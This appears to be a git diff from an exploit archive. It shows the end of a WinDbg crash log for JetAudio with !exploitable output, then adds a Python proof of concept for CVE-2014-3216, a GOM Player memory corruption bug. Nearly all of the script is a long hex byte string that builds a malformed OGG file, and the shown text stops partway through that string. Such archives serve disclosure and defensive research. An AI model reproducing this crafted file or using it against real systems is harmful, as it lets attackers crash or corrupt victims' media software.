+ModLoad: 03f30000 03f90000 C:\Program Files\Common Files\COWON\JetOGM.ax
+ModLoad: 03fe0000 0403b000 C:\Program Files\Common Files\COWON\JetAVI.ax
+ModLoad: 04440000 044b1000 C:\Program Files\Common Files\COWON\JetMKV.ax
+ModLoad: 045c0000 0465c000 C:\Program Files\Common Files\COWON\JetMP4.ax
+ModLoad: 04790000 047f7000 C:\Program Files\Common Files\COWON\JetMPG.ax
+ModLoad: 04930000 0498c000 C:\Program Files\Common Files\COWON\JetFLV.ax
+ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
+ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
+ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
+ModLoad: 57fd0000 57ff7000 C:\WINDOWS\system32\mpg2splt.ax
+ModLoad: 04ad0000 04c2b000 C:\Program Files\Common Files\COWON\JetMPAd.ax
+(cd0.6cc): Break instruction exception - code 80000003 (first chance)
+*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for
+C:\WINDOWS\system32\ntdll.dll -
+eax=7ffd9000 ebx=00000001 ecx=00000002 edx=00000003 esi=00000004
+edi=00000005
+eip=7c90120e esp=0332ffcc ebp=0332fff4 iopl=0 nv up ei pl zr na pe
+nc
+cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
+efl=00000246
+ntdll!DbgBreakPoint:
+7c90120e cc int 3
+0:011> g
+ModLoad: 03d10000 03d32000 C:\Program Files\JetAudio\JFAUDFP.DLL
+ModLoad: 03d40000 03d52000 C:\Program Files\JetAudio\JFOGGRD.DLL
+ModLoad: 03d80000 03d97000 C:\Program Files\JetAudio\JFWAVOUT.DLL
+ModLoad: 03ed0000 03ed9000 C:\Program Files\JetAudio\JXOGGDec.dll
+ModLoad: 03d10000 03da4000 C:\Program Files\JetAudio\JFDSPL.DLL
+ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
+(cd0.244): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00002620 ebx=04c40000 ecx=7ffdf000 edx=04c40608 esi=04c3db60
+edi=04c40180
+eip=7c9106f7 esp=0012cb58 ebp=0012cb64 iopl=0 nv up ei ng nz na po
+cy
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
+efl=00210283
+ntdll!wcsncpy+0x198:
+7c9106f7 f6460501 test byte ptr [esi+5],1
+ds:0023:04c3db65=??
+0:000> .load winext/msec.dll
+0:000> !exploitable
+
+!exploitable 1.6.0.0
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for
+C:\Program Files\Common Files\COWON\JetMPAd.ax -
+Exploitability Classification: UNKNOWN
+Recommended Bug Title: Data from Faulting Address controls Branch Selection
+starting at ntdll!wcsncpy+0x0000000000000198 (Hash=0x9a4f2dee.0x9c6d098e)
+
+The data from the faulting address is later used to determine whether or
+not a branch is taken.'''
\ No newline at end of file
diff --git a/platforms/windows/dos/33335.py b/platforms/windows/dos/33335.py
new file mode 100755
index 000000000..51ca8b0c8
--- /dev/null
+++ b/platforms/windows/dos/33335.py 
@@ -0,0 +1,177 @@
+'''
+# Exploit Title: [Gomplayer Memory Corruption vulnerability latest Version
+2.2.57.5189 ]
+# Date: [2014/05/06]
+# Exploit Author: [Aryan Bayaninejad]
+# Linkedin : https://www.linkedin.com/profile/view?id=276969082
+# Vendor Homepage: [www.gomlab.com]
+# Software Link: [
+http://filehippo.com/download_gom_player/download/126691285c2a87ec66d7f74b48639f08/
+]
+# Version: [Version 2.2.57.5189 and probably prior to that]
+# Tested on: [Windows Xp Sp 3 x86]
+# CVE : [CVE-2014-3216]
+
+details:
+
+Gomplayer version 2.2.57.5189 and prior to that are vulnerable to a memory
+corruption vulnerability via a malformed ogg file format , Tested on
+Windows XP Sp3 x86.
+
+
+Poc:
+
+'''
+
+#!/usr/bin/python
+
+data =
+"\x4F\x67\x67\x53\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x00\x00\x00\x00\xC7\x72\x7C\x6F\x01\x1E\x01\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x05\x99\xAC\x00\x00\xFD\xFF\xCF\xFC\x09\xFF\x99\x0F\xF9\x0F\x8F\x7F\xB9\x01\x4F\x67\x67\x53\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x0B\x00\x00\x01\x00\x00\x00\x15\x5A\x7E\x0C\x11\x4A\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x03\x76\x6F\x72\x62\x69\x73\x00\x00\x00\x00\x58\x69\x70\x68\x2E\x4F\x72\x67\x20\x6C\x69\x62\x56\x6F\x72\x62\x69\x73\x20\x49\x20\x32\x30\x30\x32\x30\x37\x31\x37\x01\x00\x00\x00\x19\x00\x00\x00\x53\x6F\x6E\x79\x20\x4F\x67\x67\x20\x56\x6F\x72\x62\x69\x73\x20\x31\x2E\x30\x20\x46\x69\x6E\x61\x6C\x01\x05\x76\x6F\x72\x62\x69\x73\x29\x42\x43\x56\x01\x00\x08\x00\x00\x80\x22\x4C\x20\xC3\x80\xD0\x90\x55\x00\x00\x10\x00\x00\x80\xA8\x36\x14\x6B\xA9\xB1\xD6\x1A\x63\xA1\x28\x46\xD4\x62\x6A\x31\xC6\x18\x63\xE3\x2C\x46\x90\x62\x8B\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x8C\x31\xC6\x18\x63\x20\x34\x64\x15\x00\x00\x04\x00\x40\x31\xEA\x15\x93\x9E\x42\xCC\x39\xE7\xDC\x18\xA6\x8D\x51\xDA\x29\xC7\x39\xE7\xDC\x18\xC5\x89\x30\x58\x21\xA5\xB9\xA5\x9A\x52\xCC\xA1\x93\x9C\x4A\xCA\x39\xE7\x1C\x08\x0D\x59\x05\x00\x00\x02\x00\x40\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x48\x
21\x85\x14\x52\x4A\x29\xA5\x94\x62\x8A\x29\xA6\x98\x62\x8A\x29\xA6\x98\x72\xCC\x31\xC7\x1C\x83\x0C\x32\xE8\xA4\x93\x4E\x3A\xE9\x24\xA4\x90\x42\x09\xA5\xA4\x92\x52\x4A\xAD\xC5\x1A\x6B\xEF\xBD\xF7\x9E\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xEF\xBD\xF7\xDE\x7B\xCF\x39\x07\x42\x43\x56\x01\x00\x20\x00\x00\x04\x42\x06\x21\x84\x10\x42\x08\x21\x84\x14\x52\x48\x21\xA6\x98\x62\xCA\x29\xA7\x80\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x4B\xB1\x14\x4D\xD1\x1C\xCF\xF1\x1C\xCF\x11\x1D\x53\x12\x25\x53\x32\x25\x53\x72\x2D\xD7\x32\x2D\x53\x33\x3D\xD3\x33\x45\x55\x74\x55\x53\x55\x65\xD7\x75\x65\x53\x36\x65\x53\x36\x65\x55\x36\x65\x53\x36\x65\x53\x36\x65\xD5\x95\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x23\x29\x8E\xE2\x38\x8E\xE3\x48\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\x60\x28\x8A\xA3\x48\x8E\x24\x59\x92\x65\x59\x96\x67\x99\x9A\xE9\x99\x9E\x69\x9A\xA6\x69\x9A\xA6\x09\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\xA0\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\xA6\x69\x9A\x66\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x96\x65\x59\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\xC7\x71\x1C\xC7\x71\x1C\xC7\x71\x1C\x47\x72\x24\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\x40\x52\x24\xC5\x72\x34\x47\x73\x34\xC7\x73\x3C\x47\x74\x44\x47\x94\x4C\x49\x95\x5C\x4B\xB6\x64\x0D\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x33\x2C\x43\x53\x3C\x47\xB3\x44\x4D\xD4\x44\x51\xF4\x44\x4F\x14\x45\xD1\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x3C\xCF\xF3\x80\xD0\x90\x55\x00\x00\x04\x00\x00\x01\x9D\x66\x98\x6A\x80\x08\x33\x92\x59\x20\x34\x64\x15\x00\x80\x00\x00\x00\x10\x81\x0C\x53\x0C\x08\x0D\x59\x05\x00\x00\x04\x00\x00\x48\x91\xE4\x24\x89\x92\x93\x52\x4A\x39\x0C\x92\xC5\x24\xA9\x94\x
93\x52\x4A\x79\x14\x93\x47\x35\xC9\x18\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x0C\x92\xE5\x28\xA9\x94\x93\x52\x4A\x49\x8C\x92\xC5\x28\xA9\x52\x93\x52\x4A\x79\x94\x93\x27\x35\xC9\xD8\x93\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x59\x90\x92\x27\x2D\xE9\x1A\x94\x52\x4A\x49\x8E\x92\x06\x2D\xD9\xD4\x93\x52\x4A\x89\x52\x94\x28\x39\xD9\x9E\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\xF9\xA0\x94\x0F\x42\x29\xA5\x94\x52\x4A\xB9\xDA\x93\x6B\x3D\x29\xA5\x94\x52\x4A\x19\xA3\x94\xF0\x49\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\xCA\x08\x42\x43\x56\x01\x00\x40\x00\x00\x80\x71\xD6\x28\x87\xA2\x93\xE8\x7C\x71\x86\x72\xA6\x29\x48\x2A\x94\x26\x74\x6F\x92\xA3\xE4\x39\xC9\xAD\xB4\xDC\x9C\x6E\xC2\x39\xA7\x9B\x53\xCE\xF9\xE4\x9C\x73\x82\xD0\x90\x55\x00\x00\x20\x00\x00\x84\x10\x52\x48\x21\x85\x14\x52\x48\x21\x85\x14\x52\x88\x21\x86\x18\x72\xC8\x29\xA7\xA0\x82\x0A\x2A\xA9\xA4\xA2\x8A\x2A\xAA\xAC\xB2\xCC\x32\xCB\x2C\xB3\xCC\x32\xCB\x2C\xB3\xCC\x32\xEB\xAC\xA3\x8E\x3A\x0B\x29\x84\x92\x42\x0B\xAD\xD5\x18\x6B\x8C\xB1\xD5\xDE\x9C\xB4\x35\x47\x29\x9D\x94\x52\x4A\x29\xA5\x94\xCE\x39\xE7\x9C\x20\x34\x64\x15\x00\x00\x02\x00\x40\x20\x64\x90\x41\x06\x19\x65\x14\x52\x88\x21\xA6\x9C\x72\xCA\x29\xA8\xA4\x92\x0A\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x10\x25\xD3\x31\x1D\xD1\x11\x15\xD1\x11\x1D\xD1\x11\x1D\xD1\x11\x1D\xCF\xF1\x1C\x4F\x12\x25\xD1\xF2\x2C\x51\x33\x3D\x53\x34\x4D\xD3\x55\x65\x57\x96\x75\xD9\x96\x6D\x57\x97\x75\x5B\x97\x7D\xDB\xB7\x75\xDB\xB6\x7D\xDD\xD8\x8D\xDF\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\xE3\x38\x8E\x63\x08\x42\x43\x56\x01\x00\x20\x00\x00\x00\x42\x08\x21\x84\x14\x52\x48\x21\x85\x94\x62\x8A\x31\xE7\xA0\x83\x10\x42\x29\x81\xD0\x90\x55\x00\x00\x20\x00\x80\x00\x00\x00\x00\x45\x71\x14\xC7\x91\x1C\x49\x92\x24\x4B\xB2\x2C\xCD\xD2\x34\x4D\xD3\x34\x4F\xF4\x44\xCF\xF4\x54\xCF\x15\x65\xD1\x16\x6D\xCF\xF5\x6C\xD1\xF6\x5C\x4F\xF5\x54\x4F\x15\x55\x53\x35\x5D\xD3\x55\x5D\xD7\x75\x5D\xD5\x55\x65\x55\x76\x6D\xDB\xB6\x6D\xDB\xB6\x6D\xDB\x
B6\x6D\xDB\xB6\x6D\xDB\xB6\x65\x20\x34\x64\x15\x00\x20\x01\x00\xA0\x23\x39\x92\x22\x29\x92\x22\x39\x8E\x23\x39\x92\x04\x84\x86\xAC\x02\x00\x64\x00\x00\x04\x00\xA0\x28\x8A\xE2\x38\x8E\xE4\x58\x92\x25\x69\x92\x28\x99\x96\x6A\xB9\x9A\xEC\xE9\x9E\x2E\xEA\xA2\x0E\x84\x86\xAC\x02\x00\x00\x01\x00\x04\x00\x00\x00\x00\x00\x60\x88\x86\x68\x88\x8E\x68\x89\x9A\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\xA2\x28\x8A\x9E\xE7\x79\x9E\xE7\x79\x9E\xE7\x79\x40\x68\xC8\x2A\x00\x40\x02\x00\x40\x47\x72\x24\xC7\x52\x2C\x45\x52\x24\xC5\x72\x2C\x07\x08\x0D\x59\x05\x00\xC8\x00\x00\x08\x00\xC0\x31\x1C\x43\x52\x24\xC7\xB2\x2C\x4B\xD3\x34\xCF\xF3\x3C\x4F\xF4\x44\x51\x14\x45\xD3\x54\x4D\x15\x08\x0D\x59\x05\x00\x00\x02\x00\x08\x00\x00\x00\x00\x00\x40\x51\x14\xCB\xB1\x1C\x49\xD2\x1C\x4F\x12\x1D\x51\x12\x25\xD1\x12\x25\x51\x13\x35\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x45\x51\x14\x81\xD0\x90\x95\x00\x00\x19\x00\x00\x03\xB1\xF5\xD4\x72\xEE\x8D\xA0\x48\x2A\x47\xB5\xC6\xD4\x51\xE6\x24\x06\x61\x1A\x8A\xA0\x82\x18\x84\x0C\x15\x44\x88\x51\x0E\x26\x62\x0A\x19\x26\x39\x97\x0C\x3A\xA6\x98\xD4\x18\x4B\x2A\x1D\x73\x52\x6B\x4B\x25\x54\x48\x41\x0C\x36\xA6\x52\x29\xE5\xA8\x07\x42\x43\x56\x08\x00\xA1\x19\x00\x0E\xC7\x01\x24\xCD\x02\x24\x4B\x03\x00\x00\x00\x00\x00\x00\x00\x49\xD3\x00\xCD\xF3\x00\xCD\xF3\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\xC0\xF2\x3C\x40\xF3\x3C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xD1\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\x4D\xF4\x00\x4F\x34\x01\x4F\x14\x01\x00\x00\x00\x00\x00\x00\xC0\xF2\x3C\xC0\x33\x3D\xC0\x13\x4D\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1C\x4D\x03\x34\xCF\x03\x34\xCF\x03\x00\x00\x00\x00\x00\x00\x00\xCB\xF3\x00\xCF\x14\x01\xCF\x33\x01\x00\x00\x00\x00\x00\x00\x40\xF3\x44\xC0\x13\x45\xC0\x33\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x01\x0E\x00\x00\x01\x16\x42\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\x24\x41\x92\x20\x49\xD0\x34\x80\x64\x59\xF0\x34\x68\x1A\x4C\x13\x20\x59\x16\x34\x0D\x9A\x06\xD3\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\xD2\x34\x68\x1A\x34\x0D\xA2\x08\x90\x34\x0D\x9A\x06\x4D\x83\x28\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x79\x1A\x34\x0D\x9A\x06\x51\x04\x48\x9A\x07\x4D\x83\xA6\x41\x14\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x4C\x13\xA2\x08\x51\x84\x69\x02\x34\xD3\x84\x28\x42\x14\x61\x9A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x02\x80\x38\x01\x00\x87\xE2\x58\x16\x00\x00\x38\x92\x63\x59\x00\x00\xE0\x38\x8E\x65\x01\x00\x80\x65\x59\x9A\x06\x00\x00\x96\x65\x69\x1A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x28\x00\x00\x87\xA2\x
58\x16\x70\x1C\xCB\x02\x8E\x63\x59\x40\x92\x2C\x0B\x60\x59\x00\xCD\x03\x68\x1A\x40\x14\x01\x80\x00\x00\x80\x02\x07\x00\x80\x00\x1B\x34\x25\x16\x07\x28\x34\x64\x25\x00\x10\x05\x00\xE0\x50\x14\xCB\xD2\x34\x51\xE4\x38\x9A\xA6\x69\xA2\xC8\x71\x34\x4D\xD3\x44\x91\x65\x69\x9A\xE7\x99\x26\x34\xCD\xF3\x4C\x13\x9E\xE7\x79\xA6\x09\xCF\xF3\x3C\xD3\x84\x69\x8A\xA2\xAA\x02\x51\x54\x55\x01\x00\x00\x05\x0E\x00\x00\x01\x36\x68\x4A\x2C\x0E\x50\x68\xC8\x4A\x00\x20\x24\x00\xC0\xE1\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x68\x9A\xAA\xCA\x71\x34\xCD\xF3\x44\x51\x14\x4D\x53\x55\x55\x95\xE3\x58\x96\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\xCB\xD2\x34\xCF\x13\x45\x51\x34\x4D\x55\x75\x5D\x68\x9A\xE7\x89\xA2\x28\x9A\xA6\xAA\xBA\x2E\x3C\xCF\xF3\x44\xD1\x14\x4D\x55\x55\x5D\x17\x9E\xE7\x79\xA2\x68\x9A\xAA\xA9\xAA\xAE\x0B\x51\x14\x45\xD3\x34\x4D\x55\x55\x55\xD7\x05\xA2\x68\x9A\xA6\xA9\xAA\xAE\xEA\xBA\xC0\xF3\x44\xD1\x34\x55\xD5\x75\x5D\x17\x78\x9E\x28\x9A\xA6\xAA\xBA\xAE\xEB\x02\x51\x34\x4D\xD5\x54\x55\xD7\x75\x5D\x80\x69\x9A\xA6\xAA\xBA\xAE\xEC\x02\x54\x55\x55\x55\xD7\x75\x65\x17\xA0\xAA\xAA\xAA\xAA\xAE\x2B\xCB\x00\x55\x75\x5D\xD7\x75\x5D\x59\x06\xA0\xAA\xAE\xEB\xBA\xB2\x2C\x00\x00\xE0\xC0\x01\x00\x20\xC0\x08\x3A\xC9\xA8\xB2\x08\x1B\x4D\xB8\xF0\x00\x14\x1A\xB2\x22\x00\x88\x02\x00\x00\x8C\x51\x4A\x31\xA5\x0C\x63\x12\x42\x09\x21\x62\x4C\x42\x28\x21\x54\x52\x4A\x29\xA9\x94\x0A\x42\x29\xA5\x94\x50\x41\x28\xA1\xA4\x10\x32\x29\x29\xA5\x54\x4A\x05\xA1\x84\x50\x4A\xA8\x20\x94\x52\x4A\x29\x05\x00\x80\x1D\x38\x00\x80\x1D\x58\x08\x85\x86\xAC\x04\x00\xF2\x00\x00\x08\x63\x94\x62\xCC\x39\xE7\x24\x42\x4A\x31\xE6\x9C\x73\x12\x21\xA5\x18\x73\xCE\x39\xA9\x14\x63\xCE\x39\xE7\x9C\x94\x92\x31\xE7\x9C\x73\x4E\x4A\xC9\x98\x73\xCE\x39\x27\xA5\x64\xCC\x39\xE7\x9C\x93\x52\x3A\xE7\x9C\x73\xCE\x49\x29\xA5\x74\xCE\x39\xE7\xA4\x94\x52\x42\xE8\x9C\x83\x52\x4A\x29\x9D\x73\xCE\x39\x01\x00\x40\x05\x0E\x00\x00\x01\x36\x8A\x6C\x4E\x30\x12\x54\x68\xC8\x4A\x00\x20\x15\x00\xC0\xE0\x38\x96\xE5\x79\x9E\x27\x8A\xA6\x69\x49\x92\xA6\x79\x9E\x28\x9A\x
A6\xAA\x6A\x92\xA4\x69\x9E\x27\x8A\xA6\xA9\xAA\x3C\xCF\xF3\x44\x51\x14\x4D\x53\x55\x79\x9E\xE7\x89\xA2\x28\x9A\xA6\xAA\x72\x5D\x51\x14\x45\xD3\x34\x4D\x55\xE5\xBA\xA2\x27\x8A\xA6\xA9\xAA\xAE\x0A\xD1\x14\x45\xD3\x54\x55\xD7\x85\x69\x8A\xA2\x69\xAA\xAA\xEB\x42\x96\x4D\xD3\x54\x5D\xD7\x75\x61\xDB\xA6\xA9\xAA\xAA\xEA\xBA\x40\x75\x55\xD5\x75\x5D\x19\xB8\xAE\xAA\xBA\xAE\x2C\x0B\x00\x00\x4F\x70\x00\x00\x2A\xB0\x61\x75\x84\x93\xA2\xB1\xC0\x42\x43\x56\x02\x00\x19\x00\x00\x84\x31\x08\x29\x84\x10\x52\x06\x21\xA4\x10\x42\x48\x29\x85\x90\x00\x00\x80\x01\x07\x00\x80\x00\x13\xCA\x40\xA1\x21\x2B\x01\x80\x54\x00\x00\x80\x10\x29\xA5\x94\x52\x4A\x29\x11\x63\x52\x4A\x29\xA5\x94\x52\x22\xE6\xA4\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\xA5\x94\x52\x4A\x29\x21\x84\x50\x00\x20\x76\x85\x03\xC0\x4E\x84\x0D\xAB\x23\x9C\x14\x8D\x05\x16\x1A\xB2\x12\x00\x08\x07\x00\x00\x8C\x41\x8A\x31\x08\x29\xB5\xD6\x62\x85\x90\x62\xCE\x49\x49\x29\xC6\x18\x2B\x84\x18\x73\x8E\x4A\x4A\x2D\xB6\x18\x34\xE6\x1C\x84\x94\x5A\x6B\x31\xD7\xA0\x31\xE7\x20\xA4\xD2\x5A\x8C\x35\x06\xD5\x42\x28\xA5\xB5\x18\x6B\xAD\x35\xB8\x14\x3A\x2A\xA9\xC5\x18\x6B\xAD\x41\x08\x95\x52\x8A\x31\xC6\x1A\x73\x0D\x42\xA8\x92\x42\x6C\xB1\xE6\x9A\x6B\x10\xC2\xD6\xD4\x5A\xAC\xB5\xE7\x9C\x83\x10\x3A\xB7\x14\x53\x8C\x31\xF7\x1A\x84\x10\x42\xC6\x1A\x6B\xCD\xB9\xE7\x20\x84\x10\xB6\xD6\x56\x5B\xAF\xB9\x06\x21\x84\xF0\x41\xD6\x9A\x73\x0E\x3A\x08\x21\x84\x0F\xB2\xD6\x9A\x83\xCE\x05\x00\x98\x3C\x38\x00\x40\x25\xD8\x38\xC3\x4A\xD2\x59\xE1\x68\x70\xA1\x21\x2B\x01\x80\xDC\x00\x00\x04\x21\xA5\x18\x73\xCE\x39\x07\x21\x84\x10\x42\x08\x29\x42\x8C\x31\xE6\x9C\x73\x10\x42\x08\x21\x84\x52\x52\x84\x18\x63\xCC\x39\xE7\x20\x84\x10\x42\x08\x21\xA4\x8C\x31\xE6\x9C\x73\x10\x42\x08\xA1\x94\x52\x4A\x49\x
